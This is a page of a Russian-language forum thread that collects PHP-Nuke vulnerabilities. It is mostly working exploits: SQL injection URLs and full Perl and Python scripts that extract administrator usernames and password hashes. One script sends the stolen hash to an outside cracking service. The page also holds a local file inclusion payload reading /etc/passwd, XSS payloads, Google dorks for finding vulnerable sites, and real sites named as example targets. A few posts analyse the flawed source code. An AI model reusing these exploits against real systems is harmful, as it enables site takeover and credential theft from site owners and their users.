ГлавнаяРегистрацияВход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 2 из 3
  • «
  • 1
  • 2
  • 3
  • »
Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей PHP-Nuke
Обзор уязвимостей PHP-Nuke
DecideДата: Среда, 14.11.2012, 11:28 | Сообщение # 16
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
PHP-Nuke Module eGallery "pid" Remote SQL Injection

PoC:
Код:

modules.php?name=eGallery&file=index&op=showpic&pi
d=-
9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

PHP-Nuke Module "seminar" Local FIle Inclusion

PoC:
Код:

modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../..
/etc/passwd

Google dork:
Код:

inurl:"modules.php?name=seminar"
 
DecideДата: Среда, 14.11.2012, 11:28 | Сообщение # 17
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
PHP-Nuke KutubiSitte "kid" SQL Injection

Code
#!/usr/bin/perl  
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("

    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
    |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
   ##################################################  #####
   # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
   ##################################################  #####
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                           |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#
#:-------------------------------------------------------:#
:#|                   EXAMPLE:                          |#:
:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#

");
}
sub problem{
     print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
     exit();
}
sub exploitation{
      
     $conn = LWP::UserAgent -> new;
     $conn->agent('Checkbot/0.4 ');
     $query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_auth  ors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
     $return_pwd = $conn->get($query_pwd) || problem();
     $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
     print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
    }

getopts(":h:p:U:",\%args);
      $host = $args{h} if (defined $args{h});
      $path = $args{p} if (defined $args{p});
      $user_id= $args{U}if (defined $args{U});
       
      if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
         usg();
      }
      else{
         exploitation();
      }
 
DecideДата: Среда, 14.11.2012, 11:28 | Сообщение # 18
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
SQL Injection

Exploit:
Код:

Code
modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2  A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2  A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A  

 
DecideДата: Среда, 14.11.2012, 11:28 | Сообщение # 19
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
SQL Injection

Vulnerable: Version 3.0

Exploit:
Код:

Code
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),
2/**/from/**/nuke_authors/*where%20admin%20-2
 
DecideДата: Среда, 14.11.2012, 11:29 | Сообщение # 20
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
SQL Injection

Vulnerable: Module ZClassifieds

Exploit:

Код:

modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,
aid/**/from/**/nuke_authors/*where%20admin1/**
 
DecideДата: Среда, 14.11.2012, 11:29 | Сообщение # 21
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
XSS

Vulnerable: eWeather module

Уязвимый код: в скрипте /modules/eWeather/index.php
PHP код:
Строка 35: $zipCode=$chart;
Строка 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";

Переменная "chart" не фильтруется.

PoC:
Код:

http://example.net/modules.php?name=eWeather&chart=[XSS]
 
DecideДата: Среда, 14.11.2012, 11:29 | Сообщение # 22
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
SQL Injection

Vulnerable: PHP-Nuke Platinum 7.6.b.5

Vuln script: dynamic_titles.php

Exploit:
Код:

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id name username user_email femail user_website user_avatar user_regdate user_icq user_occ user_from user_interests user_sig user_viewemail user_theme user_aim user_yim user_msnm user_password storynum umode uorder thold noscore bio ublockon ublock theme commentmax counter newsletter user_posts user_attachsig user_rank user_level broadcast popmeson user_active user_session_time user_session_page user_lastvisit user_timezone user_style user_lang user_dateformatuser_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_avatar_type user_sig_bbcode_uid user_actkey user_newpasswd last_ip user_color_gc user_color_gi user_quickreply user_allow_arcadepm kick_ban user_wordwrap agreedtos user_view_log user_effects user_privs user_custitle user_specmsg user_items user_trade points user_cash last_seen_blocker user_login_tries user_last_login_try user_gender user_birthday user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table = "nuke_users";
$uid = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
$url = shift;
$reg = shift;

$ua = LWP::UserAgent->new;
$urls = $url;
$response = $ua->get($urls);
$content = $response->content;

if ($content=~m/$reg/) {
($f,$s,$l) = split(">>",$1);
$s =~s/ Post //;
print $column.":".$s."\n";
}
}

© Inphex
 
DecideДата: Среда, 14.11.2012, 11:29 | Сообщение # 23
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
Код:
-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/

not: password and username in title! colomb number 1

not2: Adam gibi bug bulunda dolanın ortalarda, istenilince ne kadar boş bug varsa böle post edilir milw0rma.
işe yarar bug nasıl hit yapıyor görmek istiyorsanız

http://www.milw0rm.com/author/721

sadece bi bug 16000+ hit sadece milw0rm;)

Herzmn kral benimdir!
----------------------------------------------------------
 
DecideДата: Среда, 14.11.2012, 11:29 | Сообщение # 24
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
PHP-Nuke GaestebuchSQL Injection Exploit
Code
Код:
#!/usr/bin/python  
# PHP-Nuke Gaestebuch Module SQL Injection Exploit  
# Coded By Shahin Ramezany For Fun  
# E-Mail : Admin@secuiran.com   
   
import string  
import urllib  
import sys  
import re  
   
def Secuiran():  
         print "\n"  
         print "##################################################  ###"  
         print "#                WwW.Secuiran.Com                   #"  
         print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit  #"  
         print "#  Coded By Shahin . Ramezany (Vampire) For Fun     #"  
         print "# Keep It Priv8 && Never Post In Public Forum's     #"  
         print "#          E-Mail : Admin@Secuiran.com             #"  
         print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix  #"  
         print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's   #"  
         print "##################################################  ###"  
         print "\n"  
   
   
   
   
#Call Banner  
Secuiran()  
   
print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/"  
try:  
         host=raw_input("\nTarget Host (with http) : ")  
except KeyboardInterrupt:  
         print "\n[-] Program Terminated"  
         sys.exit()  
   
print "\n[+] Output File: e.e: secuiran.txt"  
   
try:  
         secuiran=raw_input("\nOutput File: ")  
except KeyboardInterrupt:  
         print "\n[-] Program Terminated"  
         sys.exit()  
   
print "\n[+] Trying  To Connect ...\n"  
   
#SQL Injection URL  
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors  +where+radminsuper=1"  
   
response = urllib.urlopen(sql_inject).read()  
   
print "[+] Trying  To Inject Code ...\n"  
#Extract Admin User  
   
findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall  
found_users=findall_users(response)  
   
#check found user length  
if len(found_users)==0:  
     print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "  
     sys.exit()  
   
#Extract Admin Hash  
response = urllib.urlopen(sql_inject).read()  
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall  
found_hashs=findall_hashs(response)  
if len(found_hashs)==0:  
     print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "  
     sys.exit()  
   
   
#Crack The Hash  
md5 = string.join( found_hashs, '' )  
print "[+] Trying To Crack The Hash ..."  
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5  
result = urllib.urlopen(crack).read()  
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall  
if re.match(result,"MD5_1_result,"+md5+" - not found"):  
    print "[-] Can Not Crack"  
    #sys.exit()  
   
found=cracked(result)  
#Convert List To String  
cracked_md5 = string.join( found, '' )  
   
#Print All Info  
Secuiran()  
print "\n[+] Host : ",host  
for i in range(len(found_users)):  
         print "\n[+] Admin User :  ",found_users[i]  
         print "\n[+] Admin Hash :  ",found_hashs[i]  
if (cracked_md5 == "not"):  
         print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!"  
else:  
         print "\n[+] Hash Cracked Successfully : ",cracked_md5  
   
#Save All Info In File  
file = open(secuiran, "w")  
file.write("**************************************************  WwW.Secuiran.Com**********************************  ****************\n")  
file.write("\n")  
file.write("HOST :")  
file.write("       ")  
file.write(host)  
file.write("\n")  
file.write("\n")  
file.write("USER                        HASH\n")  
file.write("            ")  
file.write("\n")  
for i in range(len(found_users)):  
     file.write(found_users[i])  
     file.write("                         ")  
     file.write(found_hashs[i])  
     file.write("\n")  
file.write("\n")  
if (cracked_md5 == "not"):  
         file.write("\n")  
         file.write("I Can't Crack Your Hash")  
else:  
         file.write("Cracked :")  
         file.write("            ")  
         file.write("\n")  
         file.write(cracked_md5)  
         file.write("\n")  
         file.write("**************************************************  WwW.Secuiran.Com**********************************  ****************\n")  
file.close()  
print "\n[+] Successfully, Writed To ",secuiran," File ."
 
DecideДата: Среда, 14.11.2012, 11:30 | Сообщение # 25
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab
Code
#!/usr/bin/python
#=================================================  ==============================
==================#
#                    This is a Priv8 Exploit.                    #
#                    Date: 23/02/2008 [dd,mm,yyyy]                    #
#                    #
#=================================================  ==============================
==================#
#                 PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2            #
#                    Response Analisys Method                    #
#                    #
#                    Vendor:   http://www.phpnuke.org                          #
#                    Severity:   Highest                    #
#                    Author:   The:Paradox                    #
#=================================================  ==============================
==================#                    
#              Server configuration requirments:                    #
#                magic_quotes_gpc = 0                    #   
#=================================================  ==============================
==================#                    
#                    Proud To Be Italian.                    #
#=================================================  ==============================
==================#
"""                    
                    Related Codes:
                    mainfile.php; line 89;

if (!ini_get('register_globals')) {
   @import_request_variables("GPC", "");
}
              /Your_Account/index.php; line 1700;
switch($op) {
//   [..]
   case "activate":
   activate($username, $check_num);
   break;
//   [..]   
   }
                    /Your_Account/index.php; line 161:

function activate($username, $check_num) {
   global $db, $user_prefix, $module_name, $language, $prefix;
   $username = filter($username, "nohtml", 1);
   $past = time()-86400;
   $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
   $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
   echo $sql;   
   $result = $db->sql_query($sql);

"""
#=================================================  ==============================
==================#
# Proof Of Concept / Bug Explanation:                    #
#                    #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.       #
# Byte null bypasses all query string check.                    #
#                    #
#=================================================  ==============================
==================#
# Google Dork=> Powered by PHPNuke                    #
#=================================================  ==============================
==================#
# Use this at your own risk. You are responsible for your own deeds.                    #
#=================================================  ==============================
==================#
#                    Python Exploit Starts                    #
#=================================================  ==============================
==================#
import httplib, sys, time
print "\n#===============================================  ==========#"
print "             PHPNuke <= 8.0 And Maybe Higher             "
print "          Blind Sql Injection Vulnerability Mq=0         "
print "                Response Analisys Method                 "
print "                    "
print "                Discovered By The:Paradox                "         
print "                    "
print " Usage:                    "
print " python %s [Target] [Path] [UsernameUnveryfied]          " % (sys.argv[0])
print "                    "   
print " Example:                    "         
print " python %s 127.0.0.1 /Nuke/ Abdullah                     " % (sys.argv[0])
print " python %s www.host.com / Andrea                         " % (sys.argv[0])   
print "                    "   
print "                    "     
print "#=================================================  ========#\n"
if len(sys.argv)<=3:   sys.exit()
else:   print "[.]Exploit Starting."

target = sys.argv[1]
path = sys.argv[2]

prefix = "nuke_"
port = "80"

j=1
h4sh = ""
md5tuple = []

for k in range(48,58):  md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')

# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'   
#

print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
   for i in md5tuple:
      if i == 'END':   sys.exit('[-]Exploit Failed.\n')

      conn = httplib.HTTPConnection(target,port)
      conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd  ," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})

      response = conn.getresponse()

      time.sleep(0.5)     
      if response.status == 404: sys.exit('[-]Error 404. Not Found.')     
      if response.read().find("New user verification number is invalid.") != -1:
         sys.stdout.write(chr(i))
         sys.stdout.flush()
         h4sh += chr(i)
         j += 1
         break;

print "\n\n[+]All Done.\n-=Paradoxe=-"
 
DecideДата: Среда, 14.11.2012, 11:30 | Сообщение # 26
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Ковырял я когда то PHP Nuke 8.0. Вот парачка багов:

[XSS]
http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00 "><script>alert()</script>

[XSS]
http://nuke/modules.php?name=Your_Account&op=logout
POST: redirect=1%00"><script>alert()</script>

[SQL-Inj] (POC)
http://nuke/admin.php
POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login
 
DecideДата: Среда, 14.11.2012, 11:30 | Сообщение # 27
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Ковырял PHP Nuke 8.0 нашел скулю, вродь не боян

Суть баги заключается в том, что в модуле News, в комментариях, данные об email при получении их из БД nuke не фильтрует и подставляет в запрос, что позволяет нам внедрить наш sql код

Exploit:

Для примера возьму сайт sat-port.info
Регистрируемся, редактируем наш аккаунт:
Код:
http://sat-port.info/modules.php?name=Your_Account&op=edituser

в поле Любой Email пишем:
Код:
admin@admin.ru ',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*

Берем любую новость где разрешено оставлять комментарии, к примеру эту:
Код:
http://sat-port.info/modules.php?name=News&file=article&sid=554

жмем "Комментировать" и пишем комментарий любого содержания, в результате появиться комментарий содержащий логин:хэш администратора
 
DecideДата: Среда, 14.11.2012, 11:30 | Сообщение # 28
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability
Code
##################################################  ##########

SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2398/

Description: There is SQL Injection vulnerability in printfeature.php in
myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,n  ull,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
additional filters were added, so it is not vulnerable to this attack. But
version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
Injection attack is possible (without using spaces and brackets).

##################################################  ##########

# milw0rm.com [2008-09-02]
 
DecideДата: Среда, 14.11.2012, 11:31 | Сообщение # 29
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)

/modules/Reviews/index.php
Фрагмент уязвимого кода:

Code
$uname = filter($cookie[1], "nohtml");  
     $id = intval($id);  
     $score = intval($score);  
     if (is_user($user)) {  
         $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));  
         if ($krow['karma'] == 2) {  
             $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");  
             include("header.php");  
             title(""._MODERATEDTITLE."");  
             OpenTable();  
             echo "<center>"._COMMENTMODERATED."";  
             echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";  
             CloseTable();  
             include("footer.php");  
             die();  
         } elseif ($krow['karma'] == 3) {  
             Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");  
             die();  
         }  
     }  
     $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");
 
DecideДата: Среда, 14.11.2012, 11:31 | Сообщение # 30
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Тут присутствуют сразу 2 sql-inj, в select и в insert запросах, после раскадировки кук, происходит слэширование данных, но в данном фрагменте кода данные из $cookie[1] попадают в ф-цию filter

Code
function filter($what, $strip="", $save="", $type="") {  
     if ($strip == "nohtml") {  
         $what = check_html($what, $strip);  
//        $what = htmlentities(trim($what), ENT_QUOTES);  
         // If the variable $what doesn't comes from a preview screen should be converted  
         if ($type != "preview" AND $save != 1) {  
             $what = html_entity_decode($what, ENT_QUOTES);  
         }  
     }  
     if ($save == 1) {  
         $what = check_words($what);  
         $what = check_html($what, $strip);  
         if (!get_magic_quotes_gpc()) {  
         $what = addslashes($what);  
}  
     } else {  
         $what = stripslashes(FixQuotes($what,$strip));  
         $what = check_words($what);  
         $what = check_html($what, $strip);  
     }  
     return($what);  
}


а оттуда в ф-цию check_html

Code
function check_html ($str, $strip="") {  
     /* The core of this code has been lifted from phpslash */  
     /* which is licenced under the GPL. */  
     include("config.php");  
     if ($strip == "nohtml")  
     $AllowableHTML=array('');  
     $str = stripslashes($str);  
     $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);  
     // Delete all spaces from html tags .  
     $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);  
     // Delete all attribs from Anchor, except an href, double quoted.  
     $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);  
     // Delete all img tags  
     $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);  
     // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com  
     $tmp = "";  
     while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {  
         $i = strpos($str,$reg[0]);  
         $l = strlen($reg[0]);  
         if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));  
         else $tag = strtolower($reg[1]);  
         if ($a = $AllowableHTML[$tag])  
         if ($reg[1][0] == "/") $tag = "</$tag>";  
         elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";  
         else {  
             # Place here the double quote fix function.  
             $attrb_list=delQuotes($reg[2]);  
             // A VER  
             //$attrb_list = ereg_replace("&","&",$attrb_list);  
             $tag = "<$tag" . $attrb_list . ">";  
         } # Attribs in tag allowed  
         else $tag = "";  
         $tmp .= substr($str,0,$i) . $tag;  
         $str = substr($str,$i+$l);  
     }  
     $str = $tmp . $str;  
     return $str;  
     exit;  
     /* Squash PHP tags unconditionally */  
     $str = ereg_replace("<\?","",$str);  
     return $str;  
}
 
Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей PHP-Nuke
  • Страница 2 из 3
  • «
  • 1
  • 2
  • 3
  • »
Поиск:

Вторник, 24.05.2022, 02:56
Copyright MyCorp © 2022Бесплатный хостинг uCoz